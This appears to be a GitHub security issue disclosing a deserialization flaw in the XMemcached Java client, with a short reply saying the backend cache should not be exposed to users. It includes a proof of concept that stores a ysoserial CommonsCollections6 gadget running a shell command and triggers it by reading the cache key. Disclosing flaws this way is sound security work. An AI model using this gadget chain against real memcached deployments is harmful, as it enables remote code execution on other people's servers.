[security] XMemcached deserialization vulnerability
kevin1993s opened this issue · comments
XMemcached support a series of transcoder, And they all have decode method to implement get different types of cache data. But the SerializingTranscoder using the deserialize method, And deserialize of BaseSerializingTranscoder using the ObjectInputStream#readObject. So if the cache data is a evil object, When Client attempt to get the value , It can be execute arbitrary java code.
PoC:
import ysoserial.payloads.CommonsCollections6;
....//host, user, password define
Object evilObject = new CommonsCollections6().getObject("touch /tmp/vultest");
MemcachedClient cache = null;
cache = new MemcachedClient(new ConnectionFactoryBuilder().setProtocol(Protocol.BINARY).setAuthDescriptor(ad).build(),
AddrUtil.getAddresses(host + ":" + port));
OperationFuture<Boolean> future = cache.set("testKey", expireTime, evilObject);
future.get();
cache.get("testKey");
In many cloud service scenario, They provide the NoSQL manage service online, if they use SerializingTranscoder, It will be dangerous
I think you should not export the backend cache system to users directly, if you do that, you have such security problem.